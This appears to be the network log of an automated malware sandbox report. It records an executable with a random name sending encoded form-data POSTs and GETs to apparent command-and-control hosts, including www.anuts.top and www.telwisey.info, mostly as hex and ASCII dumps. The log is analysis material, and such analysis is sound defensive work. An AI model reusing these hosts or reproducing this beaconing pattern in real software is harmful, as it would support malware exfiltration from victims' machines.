                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                    Aug 12, 2024 05:14:59.550597906 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                    Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                    Aug 12, 2024 05:14:59.550648928 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                    Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                    Aug 12, 2024 05:14:59.550678968 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                    Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                    Aug 12, 2024 05:14:59.550715923 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                    Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.449755194.9.94.85802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:01.431474924 CEST508OUTGET /4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6h HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.xn--matfrmn-jxa4m.se
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:15:02.090054989 CEST1236INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:15:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Powered-By: PHP/8.1.29
                    Data Raw: 66 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a 3d [TRUNCATED]
                    Data Ascii: fb4<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution: [TRUNCATED]
                    Aug 12, 2024 05:15:02.090114117 CEST1236INData Raw: 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61
                    Data Ascii: /responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1
                    Aug 12, 2024 05:15:02.090151072 CEST1236INData Raw: 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74
                    Data Ascii: m_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="http
                    Aug 12, 2024 05:15:02.090183020 CEST1236INData Raw: 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e 20
                    Data Ascii: " placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                    Aug 12, 2024 05:15:02.090220928 CEST884INData Raw: 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74
                    Data Ascii: pia_parkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.44975623.251.54.212802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:07.689435959 CEST759OUTPOST /li0t/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.anuts.top
                    Origin: http://www.anuts.top
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.anuts.top/li0t/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 38 4e 56 59 46 37 36 7a 48 74 43 32 4e 56 42 6d 44 45 34 6b 37 54 45 67 59 4a 75 4e 77 4d 45 48 51 3d 3d
                    Data Ascii: YXDT=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l38NVYF76zHtC2NVBmDE4k7TEgYJuNwMEHQ==


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.44975723.251.54.212802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:10.233745098 CEST779OUTPOST /li0t/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.anuts.top
                    Origin: http://www.anuts.top
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.anuts.top/li0t/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 33 33 39 66 41 61 41 7a 78 4e 63 57 73 66 66 4b 42 45 6e 70 58 4e 38 42 67 2b 58 39 66 65 52 6f 4d 3d
                    Data Ascii: YXDT=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27339fAaAzxNcWsffKBEnpXN8Bg+X9feRoM=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.44975823.251.54.212802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:12.761729956 CEST10861OUTPOST /li0t/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.anuts.top
                    Origin: http://www.anuts.top
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.anuts.top/li0t/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6b 41 6e 35 38 46 54 6a 41 78 75 71 34 50 65 75 4e 34 62 4d 42 70 67 58 55 4a 67 58 62 68 38 38 72 58 6e 38 68 4e 4d 4e 65 72 41 4e 74 46 36 50 68 6e 36 66 6f 53 68 53 6a 65 79 70 4f 35 39 72 30 35 52 39 64 46 6c 75 37 47 76 67 4e 45 49 66 54 45 35 50 6d 42 33 74 6a 2b 49 57 78 6f 74 52 75 35 42 6d 49 71 68 6b 4e 72 46 77 2b 70 79 61 4a 61 47 6b 32 38 6a 4a 42 78 6f 2b 53 35 7a 6c 6d 52 78 6e 58 32 30 77 7a 58 63 61 56 78 59 70 45 48 33 4c 6d 69 49 68 36 63 66 6a 78 63 67 76 6e 77 43 52 [TRUNCATED]
                    Data Ascii: YXDT=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1kAn58FTjAxuq4PeuN4bMBpgXUJgXbh88rXn8hNMNerANtF6Phn6foShSjeypO59r05R9dFlu7GvgNEIfTE5PmB3tj+IWxotRu5BmIqhkNrFw+pyaJaGk28jJBxo+S5zlmRxnX20wzXcaVxYpEH3LmiIh6cfjxcgvnwCRFSUk+54ZwXMq2uVfWg45fy3AGQzdV0Np8TVLwPRY+/xdMHOnXEhv4iPmemX/cOS94WU0d5qD9i2AgKZpGX3/iXT2LKbDQeBHqjcbvsf+3uO3lEe9uh4Ic1bpTELlpQIIkNOadANHvb2C0G47hpS289mPWEhU7agJWFP1Kjltroa6VdCUJXYi6RC8YAjamqKG1ttCF866n89Nmtq2ZqOPRKfrd2pc43BKWWf72kNi4RViUj1q1SPEjdVm1Tkyr4Pan9tieLsBpAAXZ6Vvb5sZC+bzduLc39lWejU3hpNfJUflhfJ9Xq2YfXc9K7daT1HyNKaI4/lCZZpBzAPxt17F6LMfSFJ9zlL13wXv9AAr2wEAzVXuP/h+S6x9x0umTug7oSrXBy1AB/jhwv504FVZRVAmxjbmiq7Bsq4IeezFzTvYJc6VdOD271QYJRHBOkstDKbE6JIo8zAUTUl7oPkBMVEyJV9n9oKjAKRPffXfF64OV5uQZQFlpvDA+SK0q+oyZo2uZjaKtuVhNz3NKtMTJUQ5ulyjMEt7leYc0i4cvfds3Qzvqd0bB+iVWlRBjZ91MOqiOzRhPrRRrZPs9Zy+QIeQEM7PWKnC3fqHQ7ryMGqy9dfROe88xB4BSGqQQ+7qgDFbWpWM9wS/mi41cuCi27sKlzLY1E7jVT [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.44975923.251.54.212802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:15.291173935 CEST497OUTGET /li0t/?ZH3=yf1H3v6h&YXDT=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.anuts.top
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.449760199.192.19.19802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:15:41.698921919 CEST771OUTPOST /ei85/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.telwisey.info
                    Origin: http://www.telwisey.info
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.telwisey.info/ei85/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 4e 4b 57 2f 30 38 51 37 61 6f 75 35 49 44 46 77 49 77 30 57 2f 34 6a 44 6e 74 36 38 6d 2f 74 69 41 3d 3d
                    Data Ascii: YXDT=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34NKW/08Q7aou5IDFwIw0W/4jDnt68m/tiA==
                    Aug 12, 2024 05:15:42.288678885 CEST1236INHTTP/1.1 404 Not Found
                    Date: Mon, 12 Aug 2024 03:15:42 GMT
                    Server: Apache
                    Content-Length: 16026
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                    Aug 12, 2024 05:15:42.288707972 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                    Aug 12, 2024 05:15:42.288733959 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                    Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                    Aug 12, 2024 05:15:42.288765907 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                    Aug 12, 2024 05:15:42.288783073 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                    Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                    Aug 12, 2024 05:15:42.288799047 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                    Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                    Aug 12, 2024 05:15:42.288815022 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
